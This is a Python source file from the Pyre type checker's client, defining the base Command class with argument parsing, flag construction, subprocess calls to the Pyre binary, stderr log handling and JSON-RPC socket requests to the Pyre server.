# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import argparse
import enum
import json
import logging
import os
import re
import resource
import signal
import subprocess
import threading
from abc import abstractmethod
from typing import Iterable, List, Optional, Set # noqa
from .. import json_rpc, log, readable_directory
from ..analysis_directory import AnalysisDirectory, resolve_analysis_directory
from ..configuration import Configuration
from ..exceptions import EnvironmentException
from ..filesystem import remove_if_exists
from ..socket_connection import SocketConnection, SocketException
TEXT = "text" # type: str
JSON = "json" # type: str
LOG = logging.getLogger(__name__) # type: logging.Logger
class ClientException(Exception):
pass
class State(enum.IntEnum):
DEAD = 0
RUNNING = 1
class ExitCode(enum.IntEnum):
SUCCESS = 0
FOUND_ERRORS = 1
FAILURE = 2
BUCK_ERROR = 3
# If the process exited due to a signal, this will be the negative signal number.
SIGSEGV = -signal.SIGSEGV
class IncrementalStyle(enum.Enum):
SHALLOW = "shallow"
TRANSITIVE = "transitive"
FINE_GRAINED = "fine_grained"
def __str__(self) -> str:
return self.value
class ProfileOutput(enum.Enum):
TRACE_EVENT: str = "trace_event"
COLD_START_PHASES: str = "cold_start_phases"
INCREMENTAL_UPDATES: str = "incremental_updates"
def __str__(self) -> str:
return self.value
class Result:
def __init__(self, code: int, output: str) -> None:
self.code = code
self.output = output # type: str
def check(self) -> None:
if self.code != ExitCode.SUCCESS:
description = ":\n{}".format(self.output) if self.output else ""
if self.code == ExitCode.SIGSEGV:
description += (
"\nThis is a Pyre bug. Please re-run Pyre with --debug "
"and provide the output to the developers."
)
raise ClientException(
"Client exited with error code {}{}".format(self.code, description)
)
def typeshed_search_path(typeshed_root: str) -> List[str]:
search_path = []
typeshed_subdirectories = ["stdlib", "third_party"]
for typeshed_subdirectory_name in typeshed_subdirectories:
typeshed_subdirectory = os.path.join(typeshed_root, typeshed_subdirectory_name)
if (
not os.path.isdir(typeshed_subdirectory)
or typeshed_subdirectory_name == "tests"
or typeshed_subdirectory_name[0] == "."
):
continue
# Always prefer newer version over older version
version_names = reversed(sorted(os.listdir(typeshed_subdirectory)))
for version_name in version_names:
# Anything under 2/ or 2.x is unusable for Pyre
if version_name.startswith("2") and version_name != "2and3":
continue
search_path.append(os.path.join(typeshed_subdirectory, version_name))
return search_path
def _convert_json_response_to_result(response: json_rpc.Response) -> Result:
if response.error:
error_code = ExitCode.FAILURE
else:
error_code = ExitCode.SUCCESS
return Result(output=json.dumps(response.result), code=error_code)
def executable_file(file_path: str) -> str:
if not os.path.isfile(file_path):
raise EnvironmentException("%s is not a valid file" % file_path)
if not os.access(file_path, os.X_OK):
raise EnvironmentException("%s is not an executable file" % file_path)
return file_path
class Command:
NAME = "" # type: str
_buffer = [] # type: List[str]
_call_client_terminated = False # type: bool
_exit_code = ExitCode.SUCCESS # type: ExitCode
_local_root = "" # type: str
def __init__(
self,
arguments: argparse.Namespace,
configuration: Configuration,
analysis_directory: Optional[AnalysisDirectory] = None,
) -> None:
self._arguments = arguments
self._configuration = configuration
self._debug = arguments.debug # type: bool
self._enable_profiling = arguments.enable_profiling # type: bool
self._enable_memory_profiling = arguments.enable_memory_profiling # type: bool
self._sequential = arguments.sequential # type: bool
self._strict = arguments.strict or (
configuration and configuration.strict
) # type: bool
self._additional_checks = arguments.additional_check # type: List[str]
self._show_error_traces = arguments.show_error_traces # type: bool
self._verbose = arguments.verbose # type: bool
self._hide_parse_errors = arguments.hide_parse_errors # type: bool
self._logging_sections = arguments.logging_sections # type: str
self._capable_terminal = arguments.capable_terminal # type: bool
self._log_identifier = arguments.log_identifier # type: str
self._logger = arguments.logger or (
configuration and configuration.logger
) # type: str
self._log_directory = arguments.log_directory # type: str
self._original_directory = arguments.original_directory # type: str
self._current_directory = arguments.current_directory # type: str
if arguments.local_configuration:
self._local_root = (
arguments.local_configuration
if os.path.isdir(arguments.local_configuration)
else os.path.dirname(arguments.local_configuration)
)
else:
self._local_root = arguments.original_directory
self._analysis_directory: AnalysisDirectory = (
analysis_directory or self.generate_analysis_directory()
)
@classmethod
def add_arguments(cls, parser: argparse.ArgumentParser) -> None:
parser.add_argument(
"-l", "--local-configuration", type=str, help="Use a local configuration"
)
parser.add_argument(
"--version",
action="store_true",
help="Print the client and binary versions of Pyre.",
)
parser.add_argument("--debug", action="store_true", help=argparse.SUPPRESS)
parser.add_argument("--sequential", action="store_true", help=argparse.SUPPRESS)
parser.add_argument("--strict", action="store_true", help=argparse.SUPPRESS)
parser.add_argument(
"--additional-check", action="append", help=argparse.SUPPRESS
)
parser.add_argument(
"--show-error-traces",
action="store_true",
help="Display errors trace information",
)
# Logging.
parser.add_argument(
"--output", choices=[TEXT, JSON], default=TEXT, help="How to format output"
)
parser.add_argument(
"--verbose", action="store_true", help="Enable verbose logging"
)
parser.add_argument(
"--enable-profiling", action="store_true", help=argparse.SUPPRESS
)
parser.add_argument(
"--enable-memory-profiling", action="store_true", help=argparse.SUPPRESS
)
parser.add_argument(
"-n",
"--noninteractive",
action="store_true",
help="Disable interactive logging",
)
parser.add_argument(
"--hide-parse-errors",
action="store_true",
help="Hide detailed information about parse errors",
)
parser.add_argument(
"--show-parse-errors",
action="store_true",
help="[DEPRECATED] Show detailed information about parse errors",
)
parser.add_argument(
"--logging-sections", help=argparse.SUPPRESS # Enable sectional logging.
)
parser.add_argument(
"--log-identifier",
default="",
help=argparse.SUPPRESS, # Add given identifier to logged samples.
)
parser.add_argument(
"--log-directory",
help=argparse.SUPPRESS, # Override default location for logs
)
parser.add_argument(
"--logger", help=argparse.SUPPRESS # Specify custom logging binary.
)
parser.add_argument("--formatter", help=argparse.SUPPRESS)
# Link tree determination.
buck_arguments = parser.add_argument_group("buck")
buck_arguments.add_argument(
"--target", action="append", dest="targets", help="The buck target to check"
)
buck_arguments.add_argument(
"--build",
action="store_true",
help="Freshly build all the necessary artifacts.",
)
buck_arguments.add_argument(
"--use-buck-builder",
action="store_true",
help="Use Pyre's experimental builder for Buck projects.",
)
buck_arguments.add_argument(
"--use-legacy-builder",
action="store_true",
help="Use Pyre's legacy builder for Buck projects.",
)
buck_arguments.add_argument(
"--buck-builder-debug", action="store_true", help=argparse.SUPPRESS
)
source_directories = parser.add_argument_group("source-directories")
source_directories.add_argument(
"--source-directory",
action="append",
dest="source_directories",
help="The source directory to check",
type=os.path.abspath,
)
source_directories.add_argument(
"--filter-directory", help=argparse.SUPPRESS # override filter directory
)
parser.add_argument(
"--use-global-shared-analysis-directory",
action="store_true",
help=argparse.SUPPRESS,
)
parser.add_argument(
"--no-saved-state",
action="store_true",
help="Don't attempt to load Pyre from a saved state.",
)
# Handling of search path
parser.add_argument(
"--search-path",
action="append",
default=[],
type=readable_directory,
help="Add an additional directory of modules and stubs to include"
" in the type environment",
)
parser.add_argument(
"--preserve-pythonpath",
action="store_true",
default=False,
help="Preserve the value of the PYTHONPATH environment variable and "
"inherit the current python environment's search path",
)
parser.add_argument(
"--binary",
default=None,
type=executable_file,
help="Location of the pyre binary",
)
parser.add_argument(
"--buck-builder-binary",
default=None,
help="Location of the buck builder binary",
)
parser.add_argument(
"--buck-builder-target", default=None, help=argparse.SUPPRESS
)
parser.add_argument(
"--exclude",
action="append",
default=[],
help="Exclude files and directories matching this regexp from parsing",
)
# Typeshed stubs location
parser.add_argument(
"--typeshed",
default=None,
type=readable_directory,
help="Location of the typeshed stubs",
)
parser.add_argument(
"--save-initial-state-to",
default=None,
help="Path to serialize pyre's initial state to.",
)
parser.add_argument(
"--load-initial-state-from", default=None, type=str, help=argparse.SUPPRESS
)
parser.add_argument(
"--changed-files-path", default=None, type=str, help=argparse.SUPPRESS
)
parser.add_argument(
"--saved-state-project", default=None, type=str, help=argparse.SUPPRESS
)
# Temporary flag to help migrate to json sockets for incremental and query
# commands.
parser.add_argument(
"--use-json-sockets",
action="store_true",
default=False,
help=argparse.SUPPRESS,
)
@classmethod
def add_subparser(cls, parser: argparse._SubParsersAction) -> None:
pass
def generate_analysis_directory(self) -> AnalysisDirectory:
return resolve_analysis_directory(self._arguments, self._configuration)
def run(self) -> "Command":
self._run()
return self
def exit_code(self) -> int:
return self._exit_code
@abstractmethod
def _run(self) -> None:
""" Abstract method expected to be overridden by subclasses. """
pass
def _flags(self) -> List[str]:
flags = []
if self._debug:
flags.extend(["-debug"])
if self._sequential:
flags.extend(["-sequential"])
if self._strict:
flags.extend(["-strict"])
if self._additional_checks:
flags.append("-additional-checks")
flags.append(",".join(self._additional_checks))
if self._show_error_traces:
flags.append("-show-error-traces")
if self._verbose:
flags.append("-verbose")
if not self._hide_parse_errors:
if self._logging_sections:
self._logging_sections = self._logging_sections + ",parser"
else:
self._logging_sections = "parser"
if not self._capable_terminal:
# Disable progress reporting for non-capable terminals.
# This helps in reducing clutter.
if self._logging_sections:
self._logging_sections = self._logging_sections + ",-progress"
else:
self._logging_sections = "-progress"
if self._logging_sections:
flags.extend(["-logging-sections", self._logging_sections])
if self._enable_profiling:
flags.extend(["-profiling-output", self.profiling_log_path()])
if self._enable_memory_profiling:
flags.extend(["-memory-profiling-output", self.profiling_log_path()])
if self._enable_profiling or self._enable_memory_profiling:
# Clear the profiling log first since in pyre binary it's append-only
remove_if_exists(self.profiling_log_path())
if self._current_directory:
flags.extend(["-project-root", self._current_directory])
if self._log_identifier:
flags.extend(["-log-identifier", self._log_identifier])
if self._logger:
flags.extend(["-logger", self._logger])
if self._log_directory:
flags.extend(["-log-directory", self._log_directory])
return flags
def _read_stdout(self, stdout: Iterable[bytes]) -> None:
self._buffer = []
for line in stdout:
self._buffer.append(line.decode())
def _read_stderr(self, stream: Iterable[bytes]) -> None:
buffer = None
log_pattern = re.compile(r"\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2} (\w+) (.*)")
try:
for line in stream:
if self._call_client_terminated:
return
line = line.decode().rstrip()
match = log_pattern.match(line)
if match:
if buffer:
buffer.flush()
buffer = log.Buffer(
section=match.groups()[0], data=[match.groups()[1]]
)
elif buffer:
buffer.append(line)
if buffer:
buffer.flush()
except Exception:
pass
def _call_client(self, command: str, capture_output: bool = True) -> Result:
if not os.path.isdir(self._analysis_directory.get_root()):
raise EnvironmentException(
"`{}` is not a link tree.".format(self._analysis_directory.get_root())
)
client_command = [self._configuration.binary, command]
client_command.extend(self._flags())
client_command.append(self._analysis_directory.get_root())
def limit_memory_usage() -> None:
try:
limit = 20 * 1024 * 1024 * 1024 # 20 GB
resource.setrlimit(resource.RLIMIT_DATA, (limit, limit))
except OSError:
# Run the process with unlimited memory if the underlying syscall fails.
pass
LOG.debug("Running `%s`", " ".join(client_command))
with subprocess.Popen(
client_command,
stdout=subprocess.PIPE if capture_output else None,
stderr=subprocess.PIPE,
preexec_fn=limit_memory_usage,
) as process:
# Read stdout output
if capture_output:
stdout_reader = threading.Thread(
target=self._read_stdout, args=(process.stdout,)
)
stdout_reader.daemon = True
stdout_reader.start()
# Read the error output and print it.
self._call_client_terminated = False
stderr_reader = threading.Thread(
target=self._read_stderr, args=(process.stderr,)
)
stderr_reader.daemon = True
stderr_reader.start()
# Wait for the process to finish and clean up.
process.wait()
# In the exceptional case, make sure that we print the error messages.
if process.returncode != 0:
stderr_reader.join()
self._call_client_terminated = True
if capture_output:
# pyre-fixme: stdout_reader is not always declared!
stdout_reader.join()
output = ""
if capture_output:
output = "".join(self._buffer)
if process.returncode != 0 and capture_output:
output = "".join(self._buffer)
return Result(code=process.returncode, output=output)
def _relative_path(self, path: str) -> str:
return os.path.relpath(path, self._original_directory)
def _state(self) -> State:
pid_path = os.path.join(self._log_directory, "server/server.pid")
try:
with open(pid_path) as file:
pid = int(file.read())
os.kill(pid, 0) # throws if process is not running
return State.RUNNING
except Exception:
return State.DEAD
# will open a socket, send a request, read the response and close the socket.
def _send_and_handle_socket_request(
self, request: json_rpc.Request, version_hash: str
) -> None:
try:
with SocketConnection(
self._configuration.log_directory
) as socket_connection:
socket_connection.perform_handshake(version_hash)
socket_connection.send_request(request)
response = json_rpc.read_response(socket_connection.input)
result = _convert_json_response_to_result(response)
result.check()
self._socket_result_handler(result)
except (
SocketException,
ResourceWarning,
ClientException,
json_rpc.JSONRPCException,
) as exception:
LOG.error("Error while waiting for server: %s", str(exception))
LOG.error("Run `pyre restart` in order to restart the server.")
self._exit_code = ExitCode.FAILURE
# Will be overwritten in subclasses to specialize how json socket
# responses are handled.
def _socket_result_handler(self, result: Result) -> None:
log.stdout.write(result.output)
def profiling_log_path(self) -> str:
return os.path.join(self._log_directory, "profiling.log")
@property
def analysis_directory(self) -> AnalysisDirectory:
return self._analysis_directory
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.